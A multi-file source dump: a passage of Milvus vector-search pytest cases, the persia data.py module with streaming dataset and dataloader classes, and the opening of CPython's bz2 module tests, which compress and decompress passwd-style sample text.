def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, **query, partition_names=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP",
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
"""
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, **query, partition_names=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_without_connect(self, dis_connect, collection):
"""
target: test search vectors without connection
method: use dis connected instance, call search method and check if search successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, **default_query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_not_existed(self, connect):
"""
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, **default_query)
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_l2(self, connect, collection):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Euclidean
expected: the return distance equals to the computed value
"""
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(default_nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip(self, connect, collection):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, **query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
"""
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_search_vectors_params(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, **query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
@pytest.mark.tags(CaseLabel.L0)
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, **query)
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="HAMMING")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: search with new random binary entities and SUBSTRUCTURE metric type
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUBSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: search with entities that related to inserted entities
expected: the return distance equals to the computed value
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq,
metric_type="SUPERSTRUCTURE")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUPER
expected: the return distance equals to the computed value
"""
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_search_vectors_params(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE",
replace_vecs=query_vecs)
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.tags(CaseLabel.L2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
"""
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_search_vectors_params(binary_field_name, query_entities, default_top_k, nq, metric_type="TANIMOTO")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, **query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(300)
def test_search_concurrent_multithreads_single_connection(self, connect, args):
"""
target: test concurrent search with multi processes
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
"""
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(uid)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
milvus.create_collection(collection, default_fields)
entities, ids = init_data(milvus, collection)
connect.load_collection(collection)
def search(milvus):
res = milvus.search(collection, **default_query)
assert len(res) == 1
assert res[0]._entities[0].id in ids
assert res[0]._distances[0] < epsilon
for i in range(threads_num):
t = MyThread(target=search, args=(milvus,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, connect, args):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
"""
num = 10
top_k = 10
nq = 20
collection_names = []
for i in range(num):
collection = gen_unique_str(uid + str(i))
connect.create_collection(collection, default_fields)
collection_names.append(collection)
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
for i in range(nq):
assert check_id_result(res[i], ids[i])
assert res[i]._distances[0] < epsilon
assert res[i]._distances[1] > epsilon
for i in range(num):
connect.drop_collection(collection_names[i])
class TestSearchDSL(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_query_vector_only(self, connect, collection):
"""
target: test search normal scenario
method: search vector only
expected: search status ok, the length of result
"""
entities, ids = init_data(connect, collection)
connect.load_collection(collection)
res = connect.search(collection, **default_query)
assert len(res) == nq
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L0)
def test_query_empty(self, connect, collection):
"""
method: search with empty query
expected: error raised
"""
query = {}
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
|
data.py
|
from threading import Thread
from typing import Optional
from torch.utils.data.dataset import IterableDataset as TorchIterableDataset
import persia.env as env
from persia.ctx import cnt_ctx
from persia.logger import get_default_logger
from persia.prelude import (
PyPersiaBatchDataChannel,
PyPersiaBatchDataReceiver,
PyPersiaBatchDataSender,
init_responder,
)
_logger = get_default_logger()
class IterableDataset(TorchIterableDataset):
r"""IterableChannelBase wrap the PyPersiaBatchDataChannel that provide the channel sender and
receiver.
Arguments:
buffer_size (int): PyPersiaBatchDataChannel buffer size
"""
def __init__(self, buffer_size: int):
self.persia_batch_channel = PyPersiaBatchDataChannel(buffer_size)
@property
def receiver(self) -> PyPersiaBatchDataReceiver:
"""Get PyPersiaBatchDataReceiver python wrapper"""
return self.persia_batch_channel.get_receiver()
@property
def sender(self) -> PyPersiaBatchDataSender:
"""Get PyPersiaBatchDataSender python wrapper"""
return self.persia_batch_channel.get_sender()
class StreamingDataset(IterableDataset):
r"""NatsStreamingChannel receive data from nats publisher
Arguments:
buffer_size (int): PyPersiaBatchDataChannel buffer size
"""
def __init__(
self,
buffer_size: int,
):
super(StreamingDataset, self).__init__(buffer_size)
self.initialized = False
def __iter__(self):
if not self.initialized:
world_size = env.get_world_size()
assert world_size != -1, "WORLD_SIZE not set"
init_responder(world_size, self.sender)
_logger.info("initialize the responder")
self.initialized = True
while True:
yield None
class PersiaDataset(IterableDataset):
r"""Persia data channel that provide asynchronous data handler feature to improve the performance of data preprocess.
Not support synchronous data handler temporary.
Arguments:
buffer_size (int): PyPersiaBatchDataChannel buffer size
async_iterator (bool, optional): launch the thread to generate the data asynchronous
"""
def __init__(
self,
buffer_size: int,
async_iterator: bool = True,
):
super(PersiaDataset, self).__init__(
buffer_size,
)
self.async_iterator = async_iterator
def fetch_data(self, sender: PyPersiaBatchDataSender):
"""Callback function to put the data into PyPersiaBatchDataSender
Arguments:
sender (PyPersiaBatchDataSender): PersiaBatchData sender channel to send the generate data
to the PersiaBatchData receive channel
"""
raise NotImplementedError("implement this function to fetch data")
def __iter__(self):
if self.async_iterator:
handler = Thread(target=self.fetch_data, args=(self.sender,), daemon=True)
handler.start()
for _val in range(len(self)):
yield _val
if self.async_iterator:
handler.join()
class Dataloder(object):
r"""Dataloder provide the interface to fetch the PythonBatchData from PyForward
wrapper.
Arguments:
dataset (IterableChannelBase): dataset for Dataloder to retrive replica info and sender channel
forward_buffer_size: (int, optional): gpu forward channel buffer size, this args effect the gpu memory cost
is_training (bool, optional): whether current forward status is training or not
timeout_ms (int, optional): timeout for PyForward to fetch data, millisecond unit
num_workers (int, optional): spawn thread worker number for PyForward to lookup embedding and PythonBatchData prefetch
reproducible (bool, optional): iterate the data in fixed order, make the dataflow deterministic
embedding_staleness (int, optional): max number of batched staleness embedding each rank. A staleness embedding means it prefetched from embedding server before gradient updated.
"""
def __init__(
self,
dataset: IterableDataset,
forward_buffer_size: int = 10,
is_training: bool = True,
timeout_ms: int = 1000 * 60 * 10,
num_workers: int = 10,
reproducible: bool = False,
embedding_staleness: Optional[int] = None,
):
# dynamic import the PyForward due to conditional compilation
from persia.prelude import PyForward
self.dataset = dataset
self.timeout_ms = timeout_ms
self.num_workers = num_workers
current_ctx = cnt_ctx()
assert current_ctx is not None, "Current conext is None!"
self.forward_engine = PyForward(
forward_buffer_size,
is_training,
reproducible,
embedding_staleness,
)
self.forward_engine.set_input_channel(dataset.receiver)
self.forward_engine.launch(self.num_workers)
def __iter__(self):
for _ in self.dataset:
try:
yield self.forward_engine.get_batch(self.timeout_ms)
except TimeoutError:
_logger.warn("get_batch time out, stop iter stream data")
break
def __len__(self):
return len(self.dataset)
def __del__(self):
self.forward_engine.shutdown()
|
test_bz2.py
|
from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import tempfile
import pathlib
import random
import shutil
import subprocess
import threading
from test.support import unlink
import _compression
import sys
# Skip tests if the bz2 module doesn't exist.
bz2 = support.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100,000 bytes, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(os.path.dirname(__file__), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
fd, self.filename = tempfile.mkstemp()
os.close(fd)
def tearDown(self):
unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
def testReadMultiStreamTrailingJunk(self):
self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
